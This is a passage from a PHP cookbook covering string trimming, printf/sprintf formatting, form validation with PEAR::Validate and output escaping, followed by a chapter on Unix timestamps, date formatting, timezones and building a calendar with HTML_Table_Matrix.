     hand side of a string, we can use ltrim or rtrim respectively.
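
Here’s a brief sketch of those one-sided variants, using a made-up string. It also shows the optional second argument, which lets us name the characters to strip instead of whitespace:

```php
<?php
$string = '  padded  ';

$left  = ltrim($string);   // leading whitespace removed
$right = rtrim($string);   // trailing whitespace removed

// The optional second argument lists the characters to strip instead
$dashes = trim('--padded--', '-');

echo '[', $left, '] [', $right, '] [', $dashes, ']', PHP_EOL;
```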


     How do I output formatted text?
     In certain situations text needs to be formatted in a specific way—when we’re
     working with prices, column alignments, and dates, for example.

Solution
The powerful printf and sprintf functions produce a formatted string according
to special formatting directives; the former sends the result to the output, while
the latter returns it as a string. Formatting directives take the form of a % character
followed by one or more directive elements. Here’s an example:

 <?php
 $fruit = array('banana', 'mango', 'pear');
 $price = array('30', '50', '35');
 $format = 'A %s costs %d cents.<br />';
 for ($i = 0; $i < 3; $i++)
 {
   printf($format, $fruit[$i], $price[$i]);
 }
 ?>



This script produces the following output:

 A banana costs 30 cents.
 A mango costs 50 cents.
 A pear costs 35 cents.



In this example, $format contains special characters, %s and %d, which printf and
sprintf recognize and replace with the values we supply as arguments. The directives
are replaced with the arguments in the same order in which they’re passed to the
function: %s will format a value as a string and %d will format the value as an integer.
To vary the order in which the values appear in the output, we can simply change
the format string without having to change the order of the arguments passed to the
printf or sprintf functions. Let’s use the array of values from the first example,
but change the output such that the values appear in a different order:

 $format = '%2$d cents will buy you a %1$s.<br />';

 for ($i = 0; $i < 3; $i++)

 {

   printf($format, $fruit[$i], $price[$i]);

 }



The %2$d format character will format the second argument as a number. If you
need to double-quote your format string for the sake of variable interpolation, you’ll
     need to escape the $ character. For example, here’s the format string we’d need if
     we wanted to add a newline character, \n, at the end:

         $format = "%2\$d cents will buy you a %1\$s.<br />\n";



     These examples are very simple, but formatting directives such as padding,
     alignment, or floating point precision can be quite complex. For more details,
     refer to the sprintf page in The PHP Manual.5
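To give a feel for those directives, here is a small sketch of padding, alignment, and precision with sprintf. The values are arbitrary, and the results in the comments assume the default "C" locale.

```php
<?php
// Two decimal places for a floating point value.
$price = sprintf('%.2f', 3.14159);            // '3.14'

// Pad an integer with leading zeros to a width of five.
$padded = sprintf('%05d', 42);                // '00042'

// Left-align a string in a ten-character column.
$left = sprintf('%-10s|', 'pear');            // 'pear      |'

// Right-align using a custom padding character (* here).
$right = sprintf("%'*10s", 'pear');           // '******pear'

// Combine directives: an 8-wide name column, then a 6-wide price column.
$line = sprintf('%-8s%6.2f', 'mango', 0.5);   // 'mango     0.50'
```

The number before the directive letter sets the minimum width, a leading minus sign switches to left alignment, and the digits after the dot set the precision.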


     How do I validate submitted data?
     Validating strings is an important part of implementing a web page form. How can
     you make sure that the data a user submits through a form is what it’s supposed to
     be—a URL or an email address, for example? The submission of invalid data is a
     very common problem.

     Solution
     The typical approach to validation includes using plenty of regular expressions.
     Fortunately, PEAR::Validate is here to help, so we don’t need to reinvent the wheel.

     PEAR::Validate offers a main class for validating strings and values that are common
     to web applications, as well as a growing number of related internationalized classes
     for dealing with country-specific requirements like UK postcodes and social security
     numbers for residents of the USA. Each class contains a collection of static methods
     (methods that can be called without constructing an object from the class) that are
     used to validate a particular value.

     Here’s how we might use three of the methods available in the main Validate
     class—namely string, email, and url—to validate the data received through a
     form:

                                                                pear_validate.php (excerpt)

         error_reporting(E_ALL);
         require_once 'strip_quotes.php';
         require_once 'Validate.php';



     5
         http://www.php.net/sprintf/


 $errors = array('name' => '', 'email' => '', 'url' => '');
 if (isset($_POST['submit']))
 {
   $name_options = array(
       'format'     => VALIDATE_ALPHA . VALIDATE_SPACE,
       'min_length' => 5
   );
   if (!Validate::string($_POST['name'], $name_options))
   {
     $errors['name'] = ' class="error"';
   }
   if (!Validate::email($_POST['email']))
   {
     $errors['email'] = ' class="error"';
   }
   if (!Validate::url($_POST['url']))
   {
     $errors['url'] = ' class="error"';
   }
 }




First, we turn off E_STRICT error reporting with the error_reporting function
because PEAR::Validate will generate E_STRICT errors (in PHP 5 releases before 5.4,
E_ALL does not include E_STRICT). You can read more about this and other
error-handling topics in Chapter 9.

Next, we include strip_quotes.php and the PEAR::Validate package. strip_quotes.php
contains code that handles magic quotes (which you can read more about in the
section called “Checking for Magic Quotes” in Chapter 1). We also create an array
in the $errors variable to store the results of the field validation. Then, having
tested to see that the form was submitted, we call the validate methods statically
to check the fields. The first check ascertains that the data in the name field is a
string containing only letters from the alphabet or space characters, and is at least
five characters long—this validation requirement is a custom requirement, and we
define it with our $name_options array.

Next, we simply need to call the methods Validate::email and Validate::url in
order to check the email and url fields submitted via the form. Note that if we pass
the value true as the second argument, PEAR::Validate checks the existence of
the specified host name against DNS, using PHP’s checkdnsrr function. Note also
     that this validation causes a time delay as the host communicates with the nearest
     DNS server.

     In our $errors array, we store an empty string if the validation passes, and
     ' class="error"' if the validation fails. We insert this string into our form’s
     <label> tags. The addition of ' class="error"' to the label elements allows us to
     give users visual feedback via CSS when a validation error occurs.

     Here’s the code for the form itself:

                                                                pear_validate.php (excerpt)

      <form class="userinfo"
          action="<?php echo $_SERVER['SCRIPT_NAME']; ?>" method="post">
        <?php
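          // Escape the submitted values before echoing them back into the form
          $name = isset($_POST['name']) ? htmlspecialchars($_POST['name'], ENT_QUOTES) : '';
          $email = isset($_POST['email']) ? htmlspecialchars($_POST['email'], ENT_QUOTES) : '';
          $url = isset($_POST['url']) ? htmlspecialchars($_POST['url'], ENT_QUOTES) : '';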
        ?>
        <legend>Enter your details</legend>
        <div>
          <label<?php echo $errors['name']; ?>>Name:</label>
          <span>
            <input type="text" name="name"
                value="<?php echo $name; ?>" />
          </span>
        </div>
        <div>
          <label<?php echo $errors['email']; ?>>Email:</label>
          <span>
            <input type="text" name="email"
                value="<?php echo $email; ?>" />
          </span>
        </div>
        <div>
          <label<?php echo $errors['url']; ?>>Website:</label>
          <span>
            <input type="text" name="url"
                value="<?php echo $url; ?>" />
          </span>
        </div>
        <div>
          <span>
            <input type="submit" name="submit" value="send" />
          </span>
        </div>
      </form>




When it’s viewed in a browser, the form will look something like Figure 3.2.




                        Figure 3.2. The form displaying before validation


When we rebuild the form after submission, we use the $errors array and some
CSS to highlight the labels of invalid fields in red:

                                                                        pear_validate.php (excerpt)

 .error {
   color: red;
   font-weight: bold;
 }



This lets users know which part of the input was invalid, as shown in Figure 3.3.




                                      Figure 3.3. The form displaying after validation


     Of course, merely changing the color of the labels to red is not very informative;
     you can improve this example by adding field validation messages to let users know
     exactly how to fix the validation problems.

     Discussion
     Validating user input and communicating errors to the user is one of the most vital
     tasks you will perform as a web developer. Of course, if PEAR::Validate is simply
     too complex for your needs, you may find the built-in ctype_* functions are more
     to your liking.6
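As a minimal sketch of what the ctype_* functions offer, the snippet below runs a few of them over sample strings. The sample values are made up, and the code assumes the ctype extension is available (it is enabled by default in standard PHP builds). These functions are meant to be given strings, which is what form input always is.

```php
<?php
// ctype_alpha: letters only.
$name_ok  = ctype_alpha('Anna');        // true
$name_bad = ctype_alpha('Anna Lee');    // false: contains a space

// ctype_digit: digits only (no sign, no decimal point).
$age_ok  = ctype_digit('42');           // true
$age_bad = ctype_digit('4.2');          // false

// ctype_alnum: letters and digits only.
$user_ok = ctype_alnum('user123');      // true

// An empty string fails the check.
$empty = ctype_digit('');               // false
```

Because each function answers a single yes-or-no question about the characters in a string, they suit simple fields such as numeric IDs better than structured values like email addresses.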

     Just remember: in the interests of security, it’s imperative that you validate all user
     input, and that you escape it before outputting it as HTML or saving it to your
     database.
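For the HTML side of that advice, a minimal sketch using htmlspecialchars might look like the following. The $submitted value is a made-up example, and the UTF-8 character set is an assumption about the page encoding. For the database side, the prepared statements covered in Chapter 2 are the usual tool.

```php
<?php
// Hypothetical submitted value containing markup.
$submitted = '<script>alert("hi")</script>';

// Convert the characters that are special in HTML into entities.
// ENT_QUOTES also converts single quotes, which matters inside attributes.
$safe = htmlspecialchars($submitted, ENT_QUOTES, 'UTF-8');

// $safe can now be placed in a page without being interpreted as markup.
$paragraph = '<p>You wrote: ' . $safe . '</p>';
```

The browser displays the escaped value exactly as the user typed it, rather than executing it.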


     Summary
     You should now have a good idea of what can be achieved with PHP’s normal string
     functions. If you can get by just using those, do so—they’re fast and easy to use, and
     are far less prone to error than are regular expressions.

     String manipulation is the core of what we PHP developers do. From user input to
     application output—HTML to a browser, SQL to a database—knowing how to handle
     strings safely, securely, and efficiently is one of the most important skills a PHP
     professional can have.

     6
         http://www.php.net/c_type/
Chapter 4

Dates and Times
Wouldn’t it be nice if we had a ten-day week? How about 100 minutes in an hour?
Ten months each year?

Dates and times are probably something you take for granted. You deal with them
every day and are probably unaware of the clever mathematical algorithms your
brain uses to anticipate how long you have to wait before Friday evening comes
around again. It’s only when you start programming with dates and times that you
realize that what you’ve taken for granted all these years is not so easy to deal with
in code. Blame it on the Romans!

In our day-to-day lives, we’re used to working with decimal (base ten) numbers,
which are optimized for dealing with groups of ten (ten ones in ten, ten tens in a
hundred, ten hundreds in a thousand, and so on). I’ll avoid giving you a math lecture,
but basically the problem with dates and times is that they don’t break down neatly
into groups of ten. Consider this:

■ In one second you have one thousand milliseconds. No problem.
■ In one minute you have 60 seconds.
■ In one hour you have 60 minutes.
■ In one day you have 24 hours.

     So, how do you calculate the number of days given a value in milliseconds? That’s
     a stack of long division! And that’s just time—what about dates?
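To make that long division concrete, here is a small sketch that breaks a millisecond value into days, hours, minutes, and seconds. The split_milliseconds function is a hypothetical helper written for this illustration, not part of PHP.

```php
<?php
// Hypothetical helper: break a duration in milliseconds into
// days, hours, minutes, and seconds.
function split_milliseconds($ms)
{
    $seconds = (int) floor($ms / 1000);

    $days    = (int) floor($seconds / 86400);   // 24 * 60 * 60 seconds in a day
    $seconds = $seconds % 86400;

    $hours   = (int) floor($seconds / 3600);    // 60 * 60 seconds in an hour
    $seconds = $seconds % 3600;

    $minutes = (int) floor($seconds / 60);
    $seconds = $seconds % 60;

    return array(
        'days'    => $days,
        'hours'   => $hours,
        'minutes' => $minutes,
        'seconds' => $seconds,
    );
}

// 90,061,000 ms is 1 day, 1 hour, 1 minute, and 1 second.
$parts = split_milliseconds(90061000);
```

Each step divides by the size of the larger unit and carries the remainder down to the next one, which is exactly the bookkeeping that base-ten numbers would spare us.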

     ■	 In one week, you have seven days (does your week begin on Sunday or Monday?).
     ■	 In one month you have … er … you don’t know exactly how many days or weeks;
        it depends on the month (and let’s not get started on leap years!).
     ■	 In one year, you have 12 months.

     Of course, that’s easy enough. How about making it more difficult? You often need
     to be able to express a date in multiple formats such as “Tuesday 18th March, 2003,”
     “03/18/03” (USA format), “18/03/03” (European format), “18th Mar 2003,” and
     “20030318” (a MySQL-style timestamp), not to forget “1047942000” (a Unix
     timestamp)!

     How do you plan to display a list of articles fetched from a database and ordered
     by date? What if you want to present something more complex, such as an online
     calendar?

     As you can see, there’s a lot to think about when working with dates and times in
     your applications. Fortunately, PHP really helps when it comes to making times
     and dates as painless as possible, thanks to powerful functions like date, but it’s
     important to develop the right strategy for dealing with dates and times early in
     your career as a PHP programmer. Take the right approach from day one, and you’ll
     avoid having to go back later and write insanely complex code to fix the mistakes
     you made as a newbie. In this chapter, we’ll be looking at the kinds of strategies
     you can employ, and solving some of the common problems you’ll face when it
     comes to programming dates and times.


     How do I use Unix timestamps?
     Timestamps are numbers that identify dates and times in a format that can be used
     to solve the types of problems you’ll typically encounter in your applications; they
     make it easier to perform operations such as ordering a list or comparing two dates.
     As a PHP developer, you’re likely to come across two types of timestamps: Unix
     timestamps and MySQL (or other database management system) timestamps.

Unix timestamps are generally the most effective format in which to represent and
manipulate date and time values—they’re a simple solution to a tricky problem. A
Unix timestamp reflects the number of seconds that have passed since the epoch:
January 1, 1970, 00:00:00 GMT. Converting dates to their Unix timestamps makes
date- and time-related calculations easy in PHP. Let’s have a look at how they work.

Solution
PHP provides functions such as time and mktime to help us deal with Unix
timestamps. time returns the current time as a Unix timestamp. As of PHP 5.1, the
superglobal element $_SERVER['REQUEST_TIME'] holds the timestamp of the start of
the current request. mktime returns a timestamp for a specified date. We use mktime
like this:

 $timestamp = mktime($hour, $minute, $second, $month, $day, $year);
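Here is a short sketch of mktime with concrete values. The timezone is pinned to UTC purely so that the results do not depend on the server’s settings; the dates are arbitrary.

```php
<?php
// Fix the timezone so the results below do not depend on server settings.
date_default_timezone_set('UTC');

// Arguments are: hour, minute, second, month, day, year.
$epoch      = mktime(0, 0, 0, 1, 1, 1970);   // 0
$second_day = mktime(0, 0, 0, 1, 2, 1970);   // 86400

// Out-of-range values roll over: day 32 of January is February 1.
$rolled    = mktime(0, 0, 0, 1, 32, 2007);
$feb_first = mktime(0, 0, 0, 2, 1, 2007);

// The difference between two timestamps is a number of seconds.
$days_between = ($feb_first - mktime(0, 0, 0, 1, 1, 2007)) / 86400;   // 31
```

Because timestamps are plain integers, comparing or subtracting two dates needs nothing more than ordinary arithmetic.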



Discussion
The downside of Unix timestamps is that, unless you’re some kind of savant, they’re
not human-readable. If I were to tell you that 1047994036 was the number of seconds
that had passed since January 1, 1970, how fast could you tell me what the date
was?
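PHP can answer that question for us. As a quick sketch, gmdate formats a timestamp in GMT regardless of the server’s timezone, and gmmktime performs the reverse conversion:

```php
<?php
// Format the timestamp from the text in GMT.
$readable = gmdate('Y-m-d H:i:s', 1047994036);
// '2003-03-18 13:27:16'

// Going the other way: build the timestamp from its GMT components.
$timestamp = gmmktime(13, 27, 16, 3, 18, 2003);
// 1047994036
```

The date function works the same way as gmdate, except that it presents the result in the default timezone.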

The other problem with Unix timestamps is that they can only be used within a
limited date range, depending on your operating system. On 32-bit Linux-based
systems, you should be able to go back as far as December 13, 1901, and forward as
far as January 19, 2038. On Windows-based operating systems, the oldest date may be
as recent as January 1, 1970. The problem lies in the size of the number used to
represent the time value. Any operating system can easily handle integer numbers up
to a certain size (a signed 32-bit integer ranges from -2,147,483,648 to
2,147,483,647), after which it must work harder to juggle oversized numbers.

For the sake of efficiency, therefore, operating systems usually impose this
“maximum” size on important values like dates and times. Linux, at least, allows
you to have negative integer values for dates; it’ll let you work with dates occurring
before January 1, 1970, while PHP on Windows may complain about such dates.
Moreover, on the flip side of this issue, another potentially Y2K-like problem that
will affect all 32-bit operating systems still in existence looms over the date
January 19, 2038.
     Perform a Google search for that date and you’ll see what I mean. Although 2038 is
     a long way off and the timestamp issue may influence no more than your choice of
     pacemaker, it’s worth bearing this glitch in mind if you’re planning an application
     that will need to work with dates from the distant past or future (perhaps on a history
     web site). To see the problem in action, try running the following script on as many
     different operating systems as you can:

      <?php
      echo '1st Jan 1899: '  . mktime(0, 0, 0, 1,  1,  1899) . '<br />';
      echo '1st Jan 1902: '  . mktime(0, 0, 0, 1,  1,  1902) . '<br />';
      echo '31st Dec 1969: ' . mktime(0, 0, 0, 12, 31, 1969) . '<br />';
      echo '1st Jan 1970: '  . mktime(0, 0, 0, 1,  1,  1970) . '<br />';
      echo '1st Jan 2037: '  . mktime(0, 0, 0, 1,  1,  2037) . '<br />';
      echo '1st Jan 2038: '  . mktime(0, 0, 0, 1,  1,  2038) . '<br />';
      echo '19th Jan 2038: ' . mktime(0, 0, 0, 1,  19, 2038) . '<br />';
      echo '20th Jan 2038: ' . mktime(0, 0, 0, 1,  20, 2038) . '<br />';
      echo '1st Jan 2039: '  . mktime(0, 0, 0, 1,  1,  2039) . '<br />';
      ?>



     Depending on your operating system (it’s a particular problem on Windows), this
     example may generate a range of different PHP warnings.
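The exact boundaries of the 32-bit range can be checked with a short sketch like the one below. It assumes a PHP build that accepts negative timestamps; the variable names are made up for illustration.

```php
<?php
// PHP_INT_SIZE is 4 on 32-bit builds and 8 on 64-bit builds.
$is_32_bit = (PHP_INT_SIZE === 4);

// The largest and smallest values a signed 32-bit integer can hold.
$max_32 = 2147483647;
$min_32 = -2147483647 - 1;

// The moments those two values represent, in GMT.
$latest   = gmdate('Y-m-d H:i:s', $max_32);   // '2038-01-19 03:14:07'
$earliest = gmdate('Y-m-d H:i:s', $min_32);   // '1901-12-13 20:45:52'
```

One second after $latest, a 32-bit timestamp has nowhere left to go, which is why January 19, 2038 is the date to watch.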

     Another aspect to be aware of when you’re dealing with Unix timestamps is that
     they vary in length; a timestamp from January 2, 1970 will obviously be shorter
     than a contemporary timestamp. When you place Unix timestamps in a MySQL database,
     bear in mind that the 11 in INT(11) is only a display width: a signed INT column
     still tops out at 2,147,483,647 (January 19, 2038), so choose BIGINT if your
     application needs to store timestamps beyond that date.


     How do I obtain the current date?
     Simple as it may seem, obtaining the current date can soon become tricky. With a
     multitude of possible client and server timezones and daylight-saving time shifts
     in action at any given point in time, you can see how this exercise can quickly
     become more complicated than it first appears.


Solution
The simplest way to obtain the current date according to your server is to use the
time function. time returns a Unix timestamp for the current date. We can use the
date function to format that date for human consumption:


 <?php

 $timestamp = time();

 echo date("F jS, Y", $timestamp); // November 7th, 2006

 ?>



The first argument to date is a series of placeholders that specify the format for the
date. The most common placeholders can be seen in Table 4.1. If you fail to specify
a timestamp argument, date defaults to the current date.

Discussion
A problem with simply formatting the result of the time function is that date uses
the server’s default timezone, not your or your visitor’s timezone. To address this
problem, we can use the date.timezone setting in php.ini or the
date_default_timezone_set function, which will change the timezone for all
date-related functions:

 <?php
 $timestamp = time();
 echo date("F jS, Y", $timestamp) . '<br />'; // August 24th, 2007
 date_default_timezone_set('America/New_York');
 echo date("F jS, Y H:i:s") . '<br />'; // August 24th, 2007 03:06:29
 date_default_timezone_set('Africa/Cairo');
 echo date("F jS, Y H:i:s"); // August 24th, 2007 10:06:29
 ?>
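To see that only the presentation changes, and not the underlying timestamp, here is a sketch that formats one fixed timestamp under three timezone settings. The timestamp and the choice of timezones are arbitrary.

```php
<?php
// A fixed timestamp: March 18, 2003, 13:27:16 GMT.
$timestamp = 1047994036;

date_default_timezone_set('UTC');
$utc = date('H:i:s', $timestamp);          // '13:27:16'

date_default_timezone_set('America/New_York');
$new_york = date('H:i:s', $timestamp);     // '08:27:16'

date_default_timezone_set('Asia/Tokyo');
$tokyo = date('H:i:s', $timestamp);        // '22:27:16'

// $timestamp itself never changed; only the way it was displayed did.
```

This is one reason to store and compare timestamps, and to apply a timezone only at the moment a date is shown to a person.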

      Table 4.1. Most Common Placeholders

      Placeholder        Description

      d                  day of the month, two digits with leading zeros
      D                  a textual representation of a day, three letters
      j                  day of the month without leading zeros
      l (lowercase L)    a full textual representation of the day of the week
      S                  English ordinal suffix for the day of the month, two characters
      F                  a full textual representation of a month, such as January or March
      m                  numeric representation of a month, with leading zeros
      M                  a short textual representation of a month, three letters
      n                  numeric representation of a month, without leading zeros
      t                  number of days in the given month
      L                  whether or not it’s a leap year
      Y                  a full numeric representation of a year, four digits
      y                  a two-digit representation of a year
      a                  lowercase am or pm
      A                  uppercase AM or PM
      g                  12-hour format of an hour without leading zeros
      G                  24-hour format of an hour without leading zeros
      h                  12-hour format of an hour with leading zeros
      H                  24-hour format of an hour with leading zeros
      i                  minutes with leading zeros
      s                  seconds with leading zeros
      I (capital i)      whether or not the date is in daylight saving time
      O                  difference to Greenwich time (GMT) in hours
      P                  difference to Greenwich time (GMT) with colon between hours and
                         minutes (added in PHP 5.1.3)
      T                  timezone setting of this machine
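The following sketch combines several of these placeholders. It uses gmdate and a fixed timestamp so that the results are repeatable; the variable names are arbitrary.

```php
<?php
$timestamp = 1047994036;   // March 18, 2003, 13:27:16 GMT

$long  = gmdate('l, F jS, Y', $timestamp);   // 'Tuesday, March 18th, 2003'
$short = gmdate('D, d M y', $timestamp);     // 'Tue, 18 Mar 03'
$usa   = gmdate('m/d/y', $timestamp);        // '03/18/03'
$clock = gmdate('g:i a', $timestamp);        // '1:27 pm'
$days  = gmdate('t', $timestamp);            // '31'
$leap  = gmdate('L', $timestamp);            // '0' (2003 is not a leap year)
```

Any character in the format string that is not a placeholder, such as the commas, slashes, and colons here, is copied to the output unchanged.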


How do I find a day of the week?
We arrange our lives by the days of the week. When we humans talk about dates,
we often use phrases like “next Tuesday” or “last Wednesday.” It’s easier for us to
understand dates this way than, say, reading a date and having to work out that it
means next Tuesday. So, given any date, say “May 31st 1984,” in an arbitrary format,
how can we easily determine the day of the week this date represents?

Solution
Rather than trying to write a complex parser to convert our date to a timestamp,
and then performing complex mathematics to subtract the number of seconds that
have occurred since the date and so forth, we simply pass the date to the strtotime
function. The strtotime function has a seemingly limitless ability to understand
dates and convert them automatically to a Unix timestamp, which we can then use
with the date function and the l (lowercase L) placeholder. Here’s strtotime in
action:

 <?php
 $timestamp = strtotime("May 31st 1984");
 $weekday = date("l", $timestamp);
 echo $weekday; // Thursday
 ?>
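strtotime also accepts an optional second argument: the timestamp to treat as “now” when resolving relative phrases. The sketch below uses it to make the results repeatable, and shows one way of handling input that strtotime cannot parse. The timezone is pinned to UTC as an assumption for the example.

```php
<?php
date_default_timezone_set('UTC');

// Use a fixed starting point so the results are repeatable.
$base = strtotime('May 31st 1984');   // a Thursday

// The second argument tells strtotime what "now" is.
$next_tuesday   = date('Y-m-d', strtotime('next tuesday', $base));     // '1984-06-05'
$last_wednesday = date('Y-m-d', strtotime('last wednesday', $base));   // '1984-05-30'

// strtotime returns false when it cannot make sense of the input.
$parsed  = strtotime('not a real date');
$weekday = ($parsed === false) ? 'unknown' : date('l', $parsed);       // 'unknown'
```

Checking for false with === matters, because 0 is itself a valid timestamp (the epoch).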




How do I find the number of days in a month?
A common task, especially when writing date-based applications such as calendars,
is to find the number of days in a month. And don’t forget that tricky month,
February! Fortunately, it’s easy to obtain the number of days in a month using PHP.

Solution
We use the strtotime function and the date function, with the t placeholder, to
gain this information easily:


          <?php
          // Naming the day avoids relying on the current day of the month
          $timestamp = strtotime("October 1");
          $days = date("t", $timestamp);
          echo $days; // 31
          ?>
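When the year matters, as it does for February, one possible approach is to build the timestamp with mktime instead. The days_in_month function below is a hypothetical helper written for this sketch.

```php
<?php
date_default_timezone_set('UTC');

// Hypothetical helper: days in a given month (1-12) of a given year.
function days_in_month($month, $year)
{
    // Build a timestamp for the first of the month, then ask date for "t".
    return (int) date('t', mktime(0, 0, 0, $month, 1, $year));
}

$feb_2007 = days_in_month(2, 2007);    // 28
$feb_2008 = days_in_month(2, 2008);    // 29 (leap year)
$oct_2007 = days_in_month(10, 2007);   // 31
```

Anchoring the timestamp to the first of the month keeps the result independent of the day on which the script happens to run.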




      How do I create a calendar?
      There comes a time in the lives of all developers when they encounter the
      intimidating task of creating a calendar of some description. Knowing where to
      begin is often the first hurdle.

      Solution
      As you’re probably beginning to discern from our previous discussion, strtotime
      is a very powerful function. In fact, you’ve seen only a small portion of its abilities
      so far. As well as calendar dates, strtotime allows you to pass in more arbitrary,
      human-readable expressions, such as +1 week, next friday, last saturday or
      even +1 year 6 months 38 days 15 hours 26 minutes 12 seconds. By utilizing
      strtotime’s impressive capabilities, and with a little help from PEAR’s
      HTML_Table_Matrix class,1 we can create a simple calendar with remarkable ease.
      Let’s get started:

                                                                               calendar.php (excerpt)

          error_reporting(E_ALL);
          require_once "HTML/Table/Matrix.php";
          define("EMPTY_COLUMN", "");



      First, we turn off E_STRICT error reporting with the error_reporting function
      because PEAR::HTML_Table_Matrix will generate E_STRICT errors; you can read more
      about this and other error-handling topics in Chapter 9. Next, we include the
      HTML_Table_Matrix package, and define a constant, EMPTY_COLUMN, in order to make
      our code more readable.

      Next, we perform validation on the month-and-year values:


      1
          You can read all about HTML_Table_Matrix at
      http://pear.php.net/package/HTML_Table_Matrix/docs/1.0.5/HTML_Table_Matrix/HTML_Table_Matrix.html.

                                                                calendar.php (excerpt)

 $months = array("January", "February", "March",
      "April", "May", "June", "July",
      "August", "September", "October",
      "November", "December");
 if (isset($_GET['month']) && in_array($_GET['month'], $months))
 {
    $month = $_GET['month'];
 }
 else
 {
   $month = date("F");
 }
 if (isset($_GET['year']) &&
      is_numeric($_GET['year']) &&
      $_GET['year'] >= 1970 &&
      $_GET['year'] <= 2038)
 {
    $year = $_GET['year'];
 }
 else
 {
    $year = date("Y");
 }



Above, we defined an array of allowed values for the $month variable. This is our
whitelist, which is used to make sure a valid month is passed. If no value or an
invalid value is passed, we use the current month. To complete our input validation,
we make sure that the $_GET['year'] value is between 1970 and 2038. Again, if
no value or an invalid value is passed, we use the current year.

The next step is to get the timestamps for the first day and the last day of the given
month in the given year:

                                                                calendar.php (excerpt)

 $start_date = strtotime("$month 1st $year");
 $end_date = strtotime("$month " .date("t", $start_date). " $year");



We then create an array of numbers that represent the first to the last day of the
month:

                                                                      calendar.php (excerpt)

       $date_range = range(1, date("t", $start_date));



      Here, we use the -1 month and +1 month modifiers to create timestamps for the
      previous and next months, and do the same for the previous and next years:

                                                                      calendar.php (excerpt)

       $previous_month = strtotime("-1 month", $start_date);
       $next_month = strtotime("+1 month", $start_date);
       $previous_year = strtotime("-1 year", $start_date);
       $next_year = strtotime("+1 year", $start_date);
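It is worth noting why these modifiers are applied to $start_date, the first of the month, rather than to an arbitrary day. The sketch below, with dates chosen for illustration and the timezone pinned to UTC, shows what happens when the starting day does not exist in the target month.

```php
<?php
date_default_timezone_set('UTC');

// Starting from the first of the month, the modifiers behave as expected.
$first = strtotime('January 1st 2007');
$next  = date('Y-m-d', strtotime('+1 month', $first));   // '2007-02-01'
$prev  = date('Y-m-d', strtotime('-1 month', $first));   // '2006-12-01'

// Starting from the 31st, "+1 month" lands on February 31, which does not
// exist, so PHP rolls the extra days over into March.
$last    = strtotime('January 31st 2007');
$skipped = date('Y-m-d', strtotime('+1 month', $last));  // '2007-03-03'
```

Since every month has a first day, stepping from the first never skips a month.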



      To make life simpler and to avoid duplication, we use sprintf and the following
      string formatter to create the links that will allow users to move backward and
      forward by one year or one month:

                                                                      calendar.php (excerpt)

       $html = "<a href='" . $_SERVER['SCRIPT_NAME'] .
           "?month=%s&amp;year=%s'>%s</a>";



      Next, we start to create an array that represents our calendar. Here we construct our
      first table row, which consists of a link to show the previous year. This is followed
      by text that represents the current year being viewed, and finally, a link to show
      the next year. We use the EMPTY_COLUMN constant to denote columns that should be
      left empty:

                                                                      calendar.php (excerpt)

       if (date("Y", $previous_year) >= 1970)
       {
         $calendar_data[] = sprintf($html, date("F", $start_date),
             date("Y", $previous_year), date("Y", $previous_year));
       }
       else
       {
         $calendar_data[] = EMPTY_COLUMN;
       }
       $calendar_data[] = EMPTY_COLUMN;
       $calendar_data[] = EMPTY_COLUMN;
       $calendar_data[] = date("Y", $start_date);
       $calendar_data[] = EMPTY_COLUMN;
       $calendar_data[] = EMPTY_COLUMN;

       if (date("Y", $next_year) < 2038 && date("Y", $next_year) != 1969)
       {
         $calendar_data[] = sprintf($html, date("F", $start_date),
             date("Y", $next_year), date("Y", $next_year));
       }
       else
       {
         $calendar_data[] = EMPTY_COLUMN;
       }




The next row is similar to the previous one, except that it shows links for the
previous month, followed by the currently viewed month and the link for the next
month, in that order:

                                                                calendar.php (excerpt)

 $calendar_data[] = sprintf($html, date("F", $previous_month),
     date("Y", $previous_month), date("M", $previous_month));
 $calendar_data[] = EMPTY_COLUMN;
 $calendar_data[] = EMPTY_COLUMN;
 $calendar_data[] = date("M", $start_date);
 $calendar_data[] = EMPTY_COLUMN;
 $calendar_data[] = EMPTY_COLUMN;
 $calendar_data[] = sprintf($html, date("F", $next_month),
     date("Y", $next_month), date("M", $next_month));



The third row simply consists of the days of the week, starting from Monday:

                                                                calendar.php (excerpt)

 $calendar_data[]     =   "Mon";
 $calendar_data[]     =   "Tue";
 $calendar_data[]     =   "Wed";
 $calendar_data[]     =   "Thu";
 $calendar_data[]     =   "Fri";
 $calendar_data[]     =   "Sat";
 $calendar_data[]     =   "Sun";




      To make sure that the numeric dates line up with the correct days of the week, we
      first insert a number of blank columns. We use the N placeholder in the date
      function so it returns the numeric day of the week (1 for Monday through 7 for
      Sunday) on which the first of the month falls, and using a for loop, we add the
      EMPTY_COLUMN constant for each day that precedes it in that week:

                                                                     calendar.php (excerpt)

       $blank_days = date("N", $start_date);

       for ($i = 1; (int) $blank_days > $i; $i++)
       {
         $calendar_data[] = EMPTY_COLUMN;
       }
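As a worked instance of that loop, take March 2003, which began on a Saturday. This sketch pins the timezone to UTC and uses a counter in place of the calendar array to show how many blank cells are produced.

```php
<?php
date_default_timezone_set('UTC');

// March 1, 2003 fell on a Saturday.
$start_date = strtotime('March 1st 2003');

// N gives 1 for Monday through 7 for Sunday.
$weekday_number = (int) date('N', $start_date);   // 6

// Cells to leave empty before the 1st in a Monday-first grid.
$blank_cells = $weekday_number - 1;               // 5

// The same value, counted with the loop condition used in calendar.php.
$count = 0;
for ($i = 1; $weekday_number > $i; $i++) {
    $count++;
}
```

Monday through Friday are left empty, so the 1 lands in the sixth column, under Sat.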



      We then add the numeric days of the current month to the calendar data array. Next,
      we instantiate our HTML_Table_Matrix object and pass our array to the setData
      method. And finally, we create a left-to-right, top-to-bottom
      HTML_Table_Matrix_Filler object so that our HTML_Table_Matrix can work out
      the rows and columns required for the final output:

                                                                     calendar.php (excerpt)

       foreach ($date_range as $day)
       {
         $calendar_data[] = $day;
       }

       $calendar = new HTML_Table_Matrix();
       $calendar->setTableSize(8,7);
       $calendar->setData($calendar_data);
       $filler = HTML_Table_Matrix_Filler::factory("LRTB", $calendar);
       $calendar->accept($filler);



      We use the toHTML method to display our results:

                                                                              calendar.php (excerpt)

 <h1>PHP Calendar</h1>
 <div id="cal">
 <?php echo $calendar->toHTML(); ?>
 </div>



The finished product can be seen in Figure 4.1.




                   Figure 4.1. A calendar generated using PEAR::HTML_Table_Matrix


And there you have it. Be intimidated no more! Keep this solution handy in your
PHP toolkit and you’ll be able to whip up a calendar in no time at all, no matter
what the application.
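If PEAR is not available, the day grid can be laid out with PHP’s own array functions. What follows is only a sketch of that alternative, not the HTML_Table_Matrix approach used in this solution: cells_to_rows and rows_to_html are hypothetical helpers, and the navigation and heading rows are left out.

```php
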